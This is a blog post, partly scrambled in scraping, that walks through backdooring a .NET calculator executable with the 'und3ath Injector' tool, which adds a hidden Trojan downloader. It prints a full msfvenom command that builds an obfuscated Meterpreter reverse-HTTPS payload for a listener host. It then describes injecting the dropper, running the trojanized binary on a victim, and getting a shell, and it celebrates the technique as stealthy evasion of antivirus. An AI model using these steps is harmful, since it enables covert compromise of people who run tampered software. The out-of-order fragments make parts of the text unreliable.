Injecting arbritary code into .

NET Assemblies using ‘und3ath Injector’
Posted on by infodox Last night I was browsing a forum I frequent – http://trojanforge.com/ and came across a piece of code named “und3ath Injector” written by a user named und3ath. It claimed to be capable of injecting arbritary code into .NET assemblies without harming the original code – in short – a stealth backdooring tool for .NET executables. The author’s article and release can be found on his blog here: http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.html this guy is a very good .NET programmer, I expect he will come out with more awesome things soon This, to me, was fascinating. What it does is it directly injects ‘evil code’ into the .net executable into one of the functions or forms that comprise the assembly, without altering the functionality of the original. It simply sneakily adds a “Little Extra”. The fact I fucking hate .NET with a passion meant I saw a hilarious extra “Evil” side to this! A trojanizer for .NET executables? AWESOME. I had trouble in the past injecting MSF payloads into .NET binaries without breaking the original binary. The proof of concept tool – und3ath Injector – has two payloads. A Messagebox payload and a “Trojan Downloader” payload. The first is proof the damn thing works, the second a more “weaponized” payload for dropping malware or backdoors on a victim system. One of the benefits of using a downloader instead of hiding a full backdoor in there is stealth – less modifications to the file, and less for an AV to sign on. So, without further ado, I am going to inject a dropper into a .NET binary, and see does it function as planned. The dropper will download a Meterpreter payload from a remote server, execute the payload, and we will take it from there… Before we do anything, we will generate our Metasploit Payload to run on the victim system and place in our webroot. The following should do the trick… msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 25 LHOST=192.168.1.41 LPORT=443 >evil.exe This creates the executable file “evil.exe” in our current working directory. The msfvenom command should be self explanatory, but if there is demand for it I will write an article later on using msfvenom. If you are capable of reading the f*cking manual you should get it

Creating the Meterpreter payload So we have our evil binary in /var/www/lulz ready to go. The victim . Here is a screenshot of it running.NET binary I chose to use is a simple calculator application.NET assemblies by “patching” them with extra . I found it online and decided it made a good enough victim for demonstration purposes.NET code. for those of you who do not know what a calculator is . We can now move on to the main part of this article – backdooring .

Use this dialogue to select the binary you wish to backdoor.. We open ‘und3ath Injector’ and select “Load File”.NET calculator Now. .

. though you could select an on click event…) When we click on this the “Payloader” menu comes up. We insert our information/selection here.Selecting a file to backdoor Next we click on any of the parts that we think would be good to inject code into (I normally choose the main class for some odd reason.

Create the Payload When you click inject. . it starts creating a new binary for you to use and you save it.

and have our Metasploit listener ready. we have our evil binary ready to deploy. We run the modified binary on the victim host and haz shell .Saving the Backdoor Now.

.NET assembly without affecting the existing functionality of the software.Got a shell =D So. as you an see. it is relatively trivial to inject arbritary code into a .